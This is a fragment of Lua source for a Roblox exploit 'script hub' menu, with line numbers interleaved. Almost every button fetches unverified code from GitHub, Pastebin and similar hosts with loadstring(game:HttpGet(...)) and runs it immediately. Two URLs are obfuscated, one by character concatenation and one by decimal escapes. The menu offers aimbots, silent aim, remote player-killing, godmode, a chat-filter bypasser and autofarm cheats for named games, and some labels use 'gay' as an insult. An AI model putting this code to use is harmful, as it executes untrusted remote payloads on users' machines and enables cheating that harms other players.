HubSection:NewButton("AuratusX", "request by emil", function()
2006
--[[
2007
AuratusX
2008
]]
2009
loadstring(game:HttpGet("https://raw.githubusercontent.com/RealMrQuacks/AuratusX/master/Load"))()
2010
end)
2011
HubSection:NewButton("Bido skins v1.8 (new)", "request by emil", function()
2012
--[[
2013
Bido skins 1.8 new version
2014
]]
2015
loadstring(game:HttpGet("https://raw.githubusercontent.com/BidoSkinsYT/BidoSkinsYT/main/Bido%20Skins%20V1.8"))()
2016
end)
2017
HubSection:NewButton("Haxker_666 v2.9 (new update)", "o:", function()
2018
--[[
2019
Haxker_666 hub fixed
2020
]]
2021
loadstring(game:HttpGet('https://raw.githubusercontent.com/FreeRobloxScripts1/Haxker_6666666-Hub/main/Script-Hub/Version-2.9'))()
2022
-- Haxker_666 2.9 new update
2023
end)
2024
HubSection:NewButton("Ghub ui v7", "good hub", function()
2025
--[[
2026
ghub ui v7
2027
]]
2028
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/Ghubv7/main/ghub%20v7.lua"))()
2029
end)
2030
HubSection:NewButton("Holf Hub", "idek what holf is", function()
2031
--[[
2032
holf hub
2033
]]
2034
loadstring(game:HttpGet("https://raw.githubusercontent.com/Podroka626/Scripts/main/Universal"))()
2035
end)
2036
HubSection:NewButton("Rayfield hub", "idek what holf is", function()
2037
--[[
2038
rayfield hub
2039
]]
2040
loadstring(game:HttpGet("https://raw.githubusercontent.com/Essinity/Rayfield-Hub/main/Script", true))()
2041
end)
2042
HubSection:NewButton("ExtremeX hub v2", "request by emil", function()
2043
--[[
2044
extremeX hub v2
2045
]]
2046
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/Evv2/main/Protected_3951169998210840.lua.txt"))()
2047
end)
2048
HubSection:NewButton("Moon ui v13", "request by emil", function()
2049
--[[
2050
moon ui v13
2051
]]
2052
loadstring(game:HttpGet("https://raw.githubusercontent.com/IlikeyocutgHAH/MoonUI-v13-102-SCRIPTS/main/MoonUI%20v13!"))()
2053
end)
2054
HubSection:NewButton("Juanko Universal Hub", "juanko universal", function()
2055
--[[
2056
juanko unvrsl hub
2057
]]
2058
loadstring(game:HttpGet("https://pastebin.com/raw/d5BS5qiX"))()
2059
end)
2060
HubSection:NewButton("Alysee hub", "request by emil", function()
2061
--[[
2062
alysee hub
2063
]]
2064
loadstring(game:HttpGet("https://raw.githubusercontent.com/NathTheDev/AlysseAndroid/main/loader.lua"))()
2065
end)
2066
HubSection:NewButton("Astronlynx hub", "request by emil", function()
2067
--[[
2068
Astronlynx hub
2069
]]
2070
loadstring(game:HttpGet("https://raw.githubusercontent.com/1tsFire/Astrolynx/main/AstrolynxScripts.lua", true))()
2071
end)
2072
HubSection:NewButton("Astronlynix hub 0.4 (new version)", "request by emil", function()
2073
--[[
2074
Astronlynix hub
2075
]]
2076
loadstring(game:HttpGet("https://freenote.biz/raw/vBfN3NeVYN", true))()
2077
end)
2078
HubSection:NewButton("Universal c9 Hub", "request by emil", function()
2079
--[[
2080
C9 hub unvrsl
2081
]]
2082
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-C9-HUB-UNIVERSAL-Fully-released-8516"))()
2083
end)
2084
HubSection:NewButton("Ghub ui V8 (new version)", "request by emil", function()
2085
--[[
2086
Ghub ui v8 new version
2087
]]
2088
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/GHUBUIV8/main/GhubUIv8.txt"))()
2089
end)
2090
HubSection:NewButton("Ghub ui V8 (old version)", "request by emil", function()
2091
--[[
2092
Ghub ui v8 old version
2093
]]
2094
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/GHUBUIV8/main/GhubUIv8.txt"))()
2095
end)
2096
HubSection:NewButton("Ghub ui V9", "request by emil", function()
2097
--[[
2098
Ghub ui v9 new
2099
]]
2100
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/Ghub-v9/main/Ghubv9UI.txt"))()
2101
end)
2102
HubSection:NewButton("Ghub ui v10 new version", "new version ghub", function()
2103
loadstring(game:HttpGet("https://raw.githubusercontent.com/gclich/Ghubv10/main/GHUBv10.txt"))()
2104
-- Ghub ui v10 new version
2105
end)
2106
HubSection:NewButton("TMR X(new version) (fixed)", "fixed", function()
2107
loadstring(game:HttpGet("https://raw.githubusercontent.com/TakeModzz/TMR-X/main/Script"))()
2108
-- Tmr x hub new version and fixed
2109
end)
2110
HubSection:NewButton("K00lkidd gui revival (old)", "k00lkid gay", function()
2111
--[[
2112
K00lkidd gui revival old
2113
]]
2114
loadstring(game:HttpGet(("https://raw.githubusercontent.com/theawesomari0/c00lgui/main/c00lgui"), true))()
2115
end)
2116
HubSection:NewButton("K00lkidd gui revival (new)", "k00lkid new gayahh gui", function()
2117
--[[
2118
K00lkidd gui revival new
2119
]]
2120
loadstring(game:HttpGet(("https://raw.githubusercontent.com/theawesomari0/c00lgui/66033e8ff67eccc421fb04b3924e42d4adf3d7a2/c00lgui%20v2.2"), true))()
2121
end)
2122
HubSection:NewButton("K00lkidd gui revival 2.3(new version)", "k00lkidd", function()
2123
loadstring(game:HttpGet("https://raw.githubusercontent.com/theawesomari0/c00lgui/main/c00lgui%20v2.3", true))()
2124
-- k00lkidd gui revival 2.3 new version
2125
end)
2126
HubSection:NewButton("Hydro hub", "blah", function()
2127
--[[
2128
Hydro hub
2129
]]
2130
loadstring(game:HttpGet("https://raw.githubusercontent.com/FRX397/Hydrohub/main/Hydro_hub", true))()
2131
end)
2132
HubSection:NewButton("The hub v3", "theeeee hub", function()
2133
--[[
2134
The hub v3
2135
]]
2136
loadstring(game:HttpGet("https://raw.githubusercontent.com/hassantheking123321/TheHub/main/The%20hub%20v3%20test",true))()
2137
end)
2138
HubSection:NewButton("Universal Shakars hub", "what the hell", function()
2139
--[[
2140
Universal shakars hub
2141
]]
2142
loadstring(game:HttpGet("https://raw.githubusercontent.com/shakar60/USH.P/main/rotected",true))()
2143
end)
2144
HubSection:NewButton("VersionHub V2.3.1", "a hub", function()
2145
loadstring(game:HttpGet("https://raw.githubusercontent.com/ScripterGamerBobux/VersionHub/main/V2.3.1.lua.txt",true))()
2146
-- Version hub
2147
end)
2148
HubSection:NewButton("Versus hub (LoaderV2)", "LoaderV2", function()
2149
loadstring(game:HttpGet("https://gitlab.com/Ner0ox/versus/-/raw/main/LoaderV2/Loader.lua"))()
2150
-- Versus hub
2151
end)
2152
HubSection:NewButton("Dex skripthub", "binarydex", function()
2153
loadstring(game:HttpGet("https://raw.githubusercontent.com/BinaryDex/DexHub/main/Init"))()
2154
--Dex hub
2155
end)
2156
HubSection:NewButton("DexHub", "dexhub", function()
2157
--dexHub
2158
loadstring(game:HttpGet("https://raw.githubusercontent.com/BinaryDex/DexHub/main/Init"))()
2159
end)
2160
HubSection:NewButton("Spanish hub v4", "no ingles", function()
2161
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-SPANISH-HUB-V4-THE-GOAT-HUB-8429"))()
2162
--Spanish v4 hub
2163
end)
2164
HubSection:NewButton("GLoader hub", "g loader", function()
2165
loadstring(game:HttpGet("https://github.com/GroceyLot/My-roblox-stuff/raw/Things/GLoader.lua"))()
2166
--Gloader hub
2167
end)
2168
HubSection:NewButton("Spaxe hub", "orbituniverse", function()
2169
loadstring(game:HttpGet("https://orbituniverse.com/spacehub"))()
2170
--Spaxe hub
2171
end)
2172
2173
HubSection:NewButton("Lego hub v3", "lego", function()
2174
loadstring(game:HttpGet("https://comensal.is-not-a.dev/legohub"))()
2175
-- Lego hub v3
2176
end)
2177
2178
HubSection:NewButton("Balkan hub x v3", "by balkan", function()
2179
loadstring(game:HttpGet("https://raw.githubusercontent.com/Balkanx/Balkan-x/main/Balkan%20x", true))()
2180
-- Balkan hub x v3
2181
end)
2182
2183
HubSection:NewButton("BUTIF Universal hub", "by BUTIF", function()
2184
loadstring(game:HttpGet("https://raw.githubusercontent.com/NEWBUTIF/Universal-Script-Hub/main/Butif%20Hub%202"))()
2185
-- Butif universal hub
2186
end)
2187
HubSection:NewButton("Plenem hub", "pyea", function()
2188
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamerScripter/Plenum-Hub/main/loader"))()
2189
-- plenum hub
2190
end)
2191
HubSection:NewButton("BritishHub v1.7 (fixed)", "fixed 1.7", function()
2192
loadstring(game:HttpGet("https://raw.githubusercontent.com/RedCoat33/Britishhub/main/Protected_7358793088278524.lua.txt", true))()
2193
-- british hub v1.7 (fixed) new version
2194
end)
2195
HubSection:NewButton("Balkan Hub v4 (new version)", "balkan Hub", function()
2196
loadstring(game:HttpGet("https://raw.githubusercontent.com/Balkanx/Balkan-x/main/Balkan%20x", true))()
2197
-- Balkan hub v4 new version
2198
end)
2199
HubSection:NewButton("soon...", "soon...", function()
2200
print("komingsoon")
2201
end)
2202
--more soon
2203
2204
2205
2206
2207
2208
2209
2210
2211
2212
2213
2214
-- game skripts
2215
local Games = Window:NewTab("Games")
2216
local GamesSection = Games:NewSection("Games")
2217
2218
GamesSection:NewLabel("FREE UGc SKRIPTS 2024")
2219
--๐Ÿผ๐Ÿผ๐Ÿผ๐Ÿผ๐Ÿผ๐Ÿ†“--
2220
GamesSection:NewLabel("๐ŸผKUNG FU PANDA 4 OBBY๐Ÿผ \n[FREE SKADOOSH๐Ÿฅ‹EMOTE]")
2221
GamesSection:NewButton("autofarm(getallfood,instantwin", "free ugx", function()
2222
2223
--kungfu:16078980231
2224
loadstring(game:HttpGet("https://raw.githubusercontent.com/ToraScript/Script/main/KungFu"))()
2225
end)
2226
GamesSection:NewButton("teleport to game", "everybodyloveskungfufighting", function()
2227
local PlaceId = 16078980231 -- kungfupanda4obby
2228
2229
game:GetService("TeleportService"):Teleport(PlaceId, game:GetService("Players").LocalPlayer)
2230
end)
2231
--kungfu:end--
2232
2233
--๐Ÿ”ช๐Ÿฉธ๐Ÿ”ช๐Ÿฉธ๐Ÿ”ช๐Ÿฉธ
2234
GamesSection:NewLabel("๐Ÿ”ช๐Ÿฉธ(SURVIVE cHUcKY's NIGHTMARE)'๐Ÿ”ช๐Ÿฉธ \nGRIEFVILLE [FREE ITEM (cHUcKY BAcKPAcK)]")
2235
GamesSection:NewButton("๐Ÿ”ชautofarm by ToraIsMe", "ToraIsMe", function()--xhuxky:16578847473
2236
loadstring(game:HttpGet('https://raw.githubusercontent.com/ToraScript/Script/main/GRIEFVILLE'))()
2237
end)
2238
GamesSection:NewButton("teleport to game", "๐Ÿฉธ๐Ÿฉธ๐Ÿ”ช๐Ÿฉธ๐Ÿ”ช๐Ÿฉธ๐Ÿ”ช", function()
2239
local PlaceId = 16578847473 -- xhuxky
2240
2241
game:GetService("TeleportService"):Teleport(PlaceId, game:GetService("Players").LocalPlayer)
2242
end)
2243
--xhuxky:end--
2244
2245
2246
--๐Ÿฆ๐Ÿฆ–๐Ÿฆ๐Ÿฆ–๐Ÿฆ๐Ÿฆ–
2247
GamesSection:NewLabel("๐Ÿฆ–GODZILLA X KONG OBBY๐Ÿฆ \n[FREE ITEMS]")
2248
GamesSection:NewButton("orbs autofarm by ToraIsMe", "free ugx", function()--godzilla:16462849084
2249
loadstring(game:HttpGet('https://raw.githubusercontent.com/ToraScript/Script/main/Godzilla'))()
2250
end)
2251
GamesSection:NewButton("teleport to game", "๐Ÿ’ฅ๐Ÿฆ–๐Ÿฆ๐Ÿฆ–๐Ÿฆ๐Ÿฆ–๐Ÿ’ฅ", function()
2252
local PlaceId = 16462849084 -- godzila
2253
2254
game:GetService("TeleportService"):Teleport(PlaceId, game:GetService("Players").LocalPlayer)
2255
end)
2256
--godzilla:end--
2257
2258
2259
GamesSection:NewLabel("[Evade๐Ÿƒ๐Ÿฝโ€โ™‚๏ธ๐Ÿ’จ]")
2260
GamesSection:NewButton("show messages", "shows xhat kause evade dont allow it", function()
2261
--xhat on
2262
game:GetService("StarterGui"):SetCoreGuiEnabled('Chat', true)
2263
end)
2264
2265
GamesSection:NewButton("AutoSpawn,godmode&more - TbaoHub", "good skript used myself", function()
2266
--evade autospawn,godmode(tbaoHub)
2267
loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubEvade"))()
2268
end)
2269
2270
GamesSection:NewButton("HydraHub mobile", "good skript used myself", function()
2271
loadstring(game:HttpGet("https://raw.githubusercontent.com/Dc2-masket27727/Mobile-s-Hub/main/Main/Hydra/Evade.exe"))();
2272
end)
2273
2274
2275
GamesSection:NewLabel("[๐Ÿ–๏ธFind The Markers๐Ÿ–๏ธ]")
2276
GamesSection:NewButton("ESP & marker traxer", "easy tp to random marker", function()loadstring(game:HttpGet('https://pastebin.com/raw/7gu2ztpP'))()
2277
end)
2278
GamesSection:NewLabel("[โŒ๐Ÿšช50/50 Pixk A Door๐Ÿšชโœ…]")
2279
GamesSection:NewButton("50/50 Pixk A Door", "reveals all doors in lime green", function()
2280
getgenv().Door = true
2281
2282
while wait() do
2283
if getgenv().Door == true then
2284
for i,v in pairs(game.Workspace.Doors:GetChildren()) do
2285
for i,l in pairs(v:GetChildren()) do
2286
if l:FindFirstChild("???") then
2287
l.BrickColor = BrickColor.new("Lime green")
2288
end
2289
end
2290
end
2291
end
2292
end
2293
end)
2294
2295
local GamesSection = Games:NewSection("[๐Ÿ—ก๏ธKAT๐Ÿ—ก๏ธ]")
2296
2297
GamesSection:NewButton("KAT GUI", "esp,spam shoot (aimbot๐Ÿ’ป)", function()--kat gui
2298
loadstring(game:HttpGet("https://pastebin.com/raw/78kG7trR"))()
2299
end)
2300
2301
GamesSection:NewButton("OP Darkyyware(might not work anymore)", "OP skript for KAT",
2302
function()-- KAT darkyyware
2303
loadstring(game:HttpGet("https://raw.githubusercontent.com/AndrewDarkyy/NOWAY/main/darkyyware.lua"))()
2304
end)
2305
GamesSection:NewButton("REALKING KAT GUI", "OP skript for KAT",
2306
function()-- REALKING KAT GUI
2307
loadstring(game:HttpGet('https://raw.githubusercontent.com/zReal-King/Knife-Ability-Test/main/Gui'))()
2308
end)
2309
GamesSection:NewButton("Kopy >REALKING KAT GUI< ๐Ÿ”‘", "key: 7hFUsGVXaQ73mxgNjQJZjp4SEXy9yPdzN4bH38PdrYNBTkQw3nH2Y2mqKFcFkS52", function()
2310
setclipboard("7hFUsGVXaQ73mxgNjQJZjp4SEXy9yPdzN4bH38PdrYNBTkQw3nH2Y2mqKFcFkS52")
2311
end)
2312
GamesSection:NewButton("Aimbot(KAT)", "shoots nearest player",
2313
function()-- kat aimbot
2314
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-AIMBOT-SKRIPT-6783"))()
2315
end)
2316
2317
GamesSection:NewLabel("[๐Ÿ’ชSTRONGMAN SIMULATOR๐Ÿ‹๐Ÿ’ช]")
2318
GamesSection:NewButton("autofarm - destinyhub (OP ASF,might by broke) ", "strngmansimslript", function()loadstring(game:HttpGet("https://raw.githubusercontent.com/itsnoctural/Destiny/main/loader.lua"))()--
2319
end)
2320
2321
GamesSection:NewButton("autofarm by Tora (OP,fast)", "yt: ToraIsMe", function()loadstring(game:HttpGet('https://raw.githubusercontent.com/ToraScript/Script/main/Strongman'))()
2322
end)
2323
2324
--Dh
2325
local GamesSection = Games:NewSection("[๐Ÿš๏ธ๐ŸงฑDa Hood๐Ÿงฑ๐Ÿš๏ธ]")
2326
2327
GamesSection:NewButton("Nyula(aimloxk)", "nyulanyula", function()--nyula aimloxk
2328
loadstring(game:HttpGet(('h'..'t'..'t'..'p'..'s'..':'..'/'..'/'..'p'..'a'..'s'..'t'..'e'..'f'..'y'..'.'..'a'..'pp'..'/'..'X'..'Y'..'Q'..'z'..'d'..'l'..'Z'..'u'..'/'..'r'..'a'..'w'), true))()
2329
end)
2330
GamesSection:NewButton("Aimloxk (use Q tool)", "Q tool", function()
2331
loadstring(game:HttpGet("https://pastebin.com/raw/DYZ2fug0",true))()
2332
end)
2333
2334
GamesSection:NewButton("any tool -dahood", "any tool pixker for dahood", function()
2335
loadstring(game:HttpGet("https://pastecode.dev/raw/7PZTHFQZwr/DaHoodanytool",true))()
2336
end)
2337
GamesSection:NewButton("StrikeHub", "dahoodhub", function()--daHood strikehub
2338
loadstring(game:HttpGet('https://raw.githubusercontent.com/DEV-TK02/StrikeHub/main/Loader'))()
2339
end)
2340
GamesSection:NewButton("DaHood Reborn Aim", "dahood aimloxk", function()loadstring(game:HttpGet("https://pastebin.com/raw/iNd3xTPv"))()
2341
end)
2342
GamesSection:NewButton("Da Hood GUI 1", "DA HOOD is kinda good", function()
2343
loadstring(game:HttpGet('https://pastebin.com/raw/ZCiS8jSd'))()
2344
end)
2345
2346
GamesSection:NewButton("DaHood GUI 2", "New GUI", function()
2347
loadstring(game:HttpGet(("https://raw.githubusercontent.com/SoftVortex/.../main/....."),true))()
2348
end)
2349
GamesSection:NewButton("Da Hood GUI 3", "DaHood Evil", function()
2350
loadstring(game:HttpGet("https://raw.githubusercontent.com/Impulseonyoutube/scripts/main/dahood"))()
2351
end)
2352
GamesSection:NewButton("Da Hood GUI 4", "DaHood Evil", function()
2353
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\71\97\109\101\114\69\109\105\108\105\97\110\111\70\70\47\116\114\105\112\95\47\109\97\105\110\47\72\117\98\10",true))()
2354
end)
2355
GamesSection:NewButton("Da Hood Gui 5", "Dahood idk", function()
2356
loadstring(game:HttpGet("https://raw.githubusercontent.com/Impulseonyoutube/scripts/main/dahood"))()
2357
end)
2358
GamesSection:NewButton("Da Hood GodMode", "invinxibility", function()
2359
p = game.Players.LocalPlayer
2360
ch = p.Character
2361
2362
ch.BodyEffects.Dead:Destroy()
2363
end)
2364
GamesSection:NewButton("DaHood Silent Aim", "silent aim", function()
2365
loadstring(game:HttpGet("https://raw.githubusercontent.com/Impulseonyoutube/scripts/main/dahood"))()
2366
end)
2367
GamesSection:NewButton("DaHood Gui 6(New and Op)", "So many skripts", function()
2368
loadstring(game:HttpGet('https://raw.githubusercontent.com/SpaceYes/Lua/Main/DaHood.Lua'))()
2369
end)
2370
GamesSection:NewButton("DaHood Gui 7(New)", "gai", function()
2371
loadstring(game:HttpGet("https://raw.githubusercontent.com/BalligusapoTT/BalligusapoTT/main/UntitledhoodGui"))()
2372
end)
2373
2374
2375
2376
local GamesSection = Games:NewSection("[๐ŸฅžPankake Empire Tykoon๐Ÿฅž]")
2377
GamesSection:NewButton("Pankake Empire Tower", "yum๐Ÿฅž๐Ÿฅž๐Ÿฅž", function()
2378
-- pankake tora
2379
loadstring(game:HttpGet("https://raw.githubusercontent.com/ToraIsMe/ToraIsMe/main/0pancake", true))()
2380
end)
2381
2382
--XHAOS GAME
2383
GamesSection:NewLabel("[โš”๏ธChaosโš”๏ธ]")
2384
2385
GamesSection:NewButton("KILL PLAYER FROM FAR V2", "selekt a player and put kill", function()--xhaos kill
2386
loadstring(game:HttpGet("https://pastebin.com/raw/W9SYMbiw"))()
2387
end)
2388
GamesSection:NewButton("xhaos skript", "for xhaos", function()--xhaos
2389
loadstring(game:HttpGet("https://pastebin.com/raw/3aks6wJy"))()
2390
end)
2391
2392
2393
2394
GamesSection:NewLabel("[๐ŸBlade Ballโ˜„๏ธ]")
2395
2396
GamesSection:NewButton("just another autoparry&spam gui", "bladeball", function()
2397
loadstring(game:HttpGet("https://pastebin.com/raw/qxA2ETxy"))()
2398
end)
2399
2400
GamesSection:NewButton("WhiteHub v1 - autoparryv1,v2 autodetekt ", "bladeball", function()
2401
loadstring(game:HttpGet("https://pastebin.com/raw/E07Wyg7L"))()
2402
end)
2403
2404
GamesSection:NewButton("bladeball- AutoparryV2 gui", "bladeball", function()
2405
--bladeball autopartyv2,antilag,holdforspam
2406
loadstring(game:HttpGet("https://pastebin.com/raw/g35Y87cu",true))()
2407
end)
2408
2409
GamesSection:NewButton("bladeball- Darkrai Hub V2", "bladeball", function()--Blade ball darkraiHubv2
2410
loadstring(game:HttpGet("https://pastefy.app/y3MGGd9n/raw"))()
2411
end)
2412
2413
GamesSection:NewButton("Alxhemy Hubv2 (OP)", "bladeball", function()
2414
--bladeball alxhemyhubv2
2415
loadstring(game:HttpGet("https://pastecode.dev/raw/g3fz5w4s/alxhemyhubv2-bladeball",true))()
2416
end)
2417
2418
GamesSection:NewButton("autoparry easy on/off gui", "bladeball", function()--bladeball auto on/off
2419
loadstring(game:HttpGet("https://paste.gg/p/anonymous/1734a4ee207844b994df2f36157afacd/files/1e79ac12fc8a47ef8263d5e9d43b7137/raw"))()
2420
end)
2421
--yes
2422
GamesSection:NewButton("bladeball", "bladeball", function()
2423
--bladeball holdbloxkbutton
2424
game:GetService("StarterGui"):SetCore("SendNotification",{
2425
Title = "skript by Hosvile",
2426
Text = "hold bloxk button to spam",
2427
Duration = 5
2428
})
2429
2430
getgenv().SpamSpeed = 8 -- 1-25
2431
2432
if not getgenv().exeSpam then
2433
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3ABlade%20Ball%20Spam",true))()
2434
end
2435
2436
getgenv().exeSpam = true
2437
end)
2438
2439
GamesSection:NewButton("Auto Klixker", "bladeball", function()
2440
--bladeball Autoklixker
2441
loadstring(game:HttpGet("https://rawscripts.net/raw/Blade-Ball-RGB-manual-spam-ui-9386", true))()
2442
end)
2443
2444
GamesSection:NewButton("autoparry, autowin, autospam, etx.", "bladeball", function()
2445
--bladeball autoparry,autowin,autospam,etx
2446
loadstring(game:HttpGet("https://raw.githubusercontent.com/Neoncat765/Neon.C-Hub-X/main/UnknownVersion"))();
2447
end)
2448
2449
GamesSection:NewButton("autoparry,spamparry & more - VixkzinJs", "bladeball", function()
2450
--autoparry,spamparry&more
2451
loadstring(game:HttpGet("https://raw.githubusercontent.com/VickzinJs/Auto-Parry123/main/Untitled-2.lua"))()
2452
end)
2453
2454
GamesSection:NewButton("The Legends Hubโšก๏ธ", "bladeball", function()
2455
-- Blade Ball the legends Hub
2456
loadstring(game:HttpGet("https://pastebin.com/raw/mqGPg69N"))()
2457
end)
2458
2459
GamesSection:NewButton("Ln Hub", "lm hub v2 bladeball V2", function()--Ln Hub (blade ball)
2460
2461
loadstring(game:HttpGet('https://raw.githubusercontent.com/No6No6No7yt/Lumin-Hub/main/BladeV2.lua'))();
2462
end)
2463
GamesSection:NewButton("AUTO PARRY", "auto parry for bladeball", function()_G.Config = {
2464
MinDistance = 10,
2465
DelBallSpeed = 3,
2466
}
2467
2468
loadstring(game:HttpGet("https://raw.githubusercontent.com/3345-c-a-t-s-u-s/-beta-/main/AutoParry.lua"))()
2469
end)
2470
GamesSection:NewButton("AUTO BLOXK", "auto bloxk for bladeball", function()--autobloxk
2471
loadstring(game:HttpGet("https://raw.githubusercontent.com/1f0yt/community/main/AutoBlock"))()
2472
end)
2473
2474
GamesSection:NewButton("Insurgent Hub", "bladeball", function()--insurgenthub
2475
loadstring(game:HttpGet('https://raw.githubusercontent.com/InsurgenceHub/IncurgenceHub.github.io/main/InsurgentHubOfficial'))()
2476
end)
2477
GamesSection:NewButton("Lumin Hub V4", "bladeball", function()--luminhubv4
2478
loadstring(game:HttpGet('https://raw.githubusercontent.com/No6No6No7yt/Lumin-Hub/main/BladeV4.lua'))();
2479
end)
2480
GamesSection:NewButton("Baller Hub", "bladeball", function()
2481
loadstring(game:HttpGet("https://raw.githubusercontent.com/LOLking123456/Blade231/main/Baller"))()
2482
end)
2483
GamesSection:NewButton("Bladeball Hub", "bladeball", function()
2484
loadstring(game:HttpGet("https://raw.githubusercontent.com/3345-c-a-t-s-u-s/SourceLua/main/Blade_Ball.lua"))()
2485
end)
2486
GamesSection:NewButton("R3THPRIV Hub", "bladeball", function()
2487
loadstring(game:HttpGet('https://raw.githubusercontent.com/R3TH-PRIV/R3THPRIV/main/loader.lua'))()
2488
end)
2489
GamesSection:NewButton("ImNotFat Hub", "bladeball", function()
2490
loadstring(game:HttpGet("https://raw.githubusercontent.com/ImNotFatBitch/LoaderScripts/main/LoaderScripts"))()
2491
end)
2492
GamesSection:NewButton("MalixiousDev Hub", "bladeball", function()
2493
loadstring(game:HttpGet(('https://raw.githubusercontent.com/malicious-dev/RobloxScripting/main/bladeball.lua'),true))()
2494
end)
2495
GamesSection:NewButton("bladeball skript", "bladeball", function()
2496
loadstring(game:HttpGet('https://raw.githubusercontent.com/Godyulikkjos/goolisn0/main/obf_iv59yI506e9j5Vx44SXUtCC0V1TdwuDipkiHVh2OcN7ntzT8Y8j89cWv39yJ22k5.lua'))()
2497
end)
2498
2499
2500
--BROOKHAVEN
2501
GamesSection:NewLabel("[๐Ÿ‡Pet Simulator X๐Ÿฉ]")
2502
2503
GamesSection:NewButton("koming soon...๐Ÿญ", "", function()
2504
--soon
2505
end)
2506
2507
2508
--BROOKHAVEN
2509
GamesSection:NewLabel("[๐ŸกBrookhaven RP๐Ÿก]")
2510
--BUTTONS
2511
GamesSection:NewButton("Juanko Hub", "skripthub by juanko", function()loadstring(game:HttpGet("https://pastebin.com/raw/qBHKy3Ss"))()
2512
end)
2513
2514
GamesSection:NewButton("Brookhaven 1", "brookhaven skript alexh01", function()
2515
loadstring(game:HttpGet("https://raw.githubusercontent.com/Alech01/Scripts-Randoms/main/Brook%20Haven%20Script"))()
2516
-- Brookhaven skript
2517
end)
2518
GamesSection:NewButton("smilex2222 Brookhaven ", "infohere", function()
2519
loadstring(game:HttpGet('https://raw.githubusercontent.com/smilex2222/script/main/Brookhavenscript.lua'))()
2520
-- Brookhaven skript 2
2521
end)
2522
GamesSection:NewButton("BOTSK HUB", "botsk hub", function()
2523
loadstring(game:HttpGet("https://raw.githubusercontent.com/BOTSKHUB/Brookhaven-SKPC/main/si"))()
2524
-- Brookhaven skript 3
2525
end)
2526
GamesSection:NewButton("Brookhaven rp v1", "v1 brookhsven skript", function()
2527
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Brookhaven-rp-v1-7505"))()
2528
-- Brookhaven skript 4
2529
end)
2530
GamesSection:NewButton("Pormans Brookhaven", "V1 keyless", function()
2531
loadstring(game:HttpGet("https://raw.githubusercontent.com/pormansutility/PormansBrookhaven/main/BrookhavenV1Keyless"))()
2532
-- Brookhaven skript 5
2533
end)
2534
GamesSection:NewButton("BrookHaven skript", "BH RP", function()
2535
loadstring(game:HttpGet("https://pastebin.com/raw/eCpipCTH"))()
2536
-- Brookhaven skript 6
2537
end)
2538
GamesSection:NewButton("BrookHaven RP xhat bypasser", "bypasst xhat only for BH", function()
2539
loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-chatbypasser-6851"))()
2540
-- Brookhaven xhatbypasser skript
2541
end)
2542
GamesSection:NewButton("REDz Hub", "redz for bh", function()
2543
loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/REDzHUB/main/REDzHUB"))()
2544
-- Brookhaven 7
2545
end)
2546
GamesSection:NewButton("โ„๏ธIxe Hubโ„๏ธ", "brookHaven ixehub", function()
2547
loadstring(game:HttpGet("https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven"))()
2548
-- ixe hub skript
2549
end)
2550
GamesSection:NewButton("โ„๏ธIxeMael7 Hubโ„๏ธ", "brookHaven ixehub", function()
2551
--Brookhaven IxeMael7
2552
loadstring(game:HttpGet("https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven"))()
2553
end)
2554
2555
2556
--BLOXFRUIT
2557
GamesSection:NewLabel("[๐Ÿ’๐ŸŠBLOX FRUITS๐Ÿ‡๐ŸŽ]")
2558
GamesSection:NewButton("REDz Hub - Blox fruit", "redzhub", function()
2559
loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/BloxFruits/main/redz9999"))()
2560
end)
2561
2562
GamesSection:NewButton("speedHub X", "blox", function()
2563
-- Blox Fruits
2564
loadstring(game:HttpGet("https://raw.githubusercontent.com/ahmadsgamer2/Speed-Hub-X/main/SpeedHubX", true))()
2565
end)
2566
2567
GamesSection:NewButton("Fiend1sh Hub", "fruits", function()
2568
-- Blox Fruit
2569
loadstring(game:HttpGet('https://raw.githubusercontent.com/Fiend1sh/FiendMain/main/ReinLoader'))()
2570
end)
2571
2572
GamesSection:NewButton("mbmxHub (no key)", "bloxfruits", function()
2573
-- blox fruits no key
2574
loadstring(game:HttpGet("https://raw.githubusercontent.com/m1M-Plqer819/any/main/mbmxhub/beta"))()
2575
end)
2576
GamesSection:NewButton("SepuhHub", "bloxfruit", function()loadstring(game:HttpGet("https://isnahamzahpastebin.tech/sepuh/puh_007.lua"))()
2577
end)
2578
GamesSection:NewButton("MTriet Hub", "bloxfruits", function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Minhtriettt/Free-Script/main/MTriet-Hub.lua"))()
2579
end)
2580
GamesSection:NewButton("BloxFruits btteam", "bloxfruits", function()
2581
loadstring(game:HttpGet('https://btteam.net/scripts-auth/', true))()
2582
end)
2583
GamesSection:NewButton("NEVAHub", "bloxfruits", function()loadstring(game:HttpGet('https://raw.githubusercontent.com/VEZ2/NEVAHUB/main/2'))()
2584
end)
2585
GamesSection:NewButton("malfume Lair Hub", "bloxfruits", function()loadstring(game:HttpGet("https://raw.githubusercontent.com/malfume/Lair/main/(BT)%F0%9F%8D%8A%E2%9B%B5"))()
2586
end)
2587
2588
GamesSection:NewLabel("[๐Ÿ‘ง๐ŸฝRate My Avatar๐Ÿ‘ฆ๐Ÿผ]")
2589
2590
GamesSection:NewButton("Rate my avatar 1", "rma1", function()
2591
loadstring(game:HttpGet("https://pastebin.com/raw/xDvJRDzg",true))()
2592
end)
2593
2594
2595
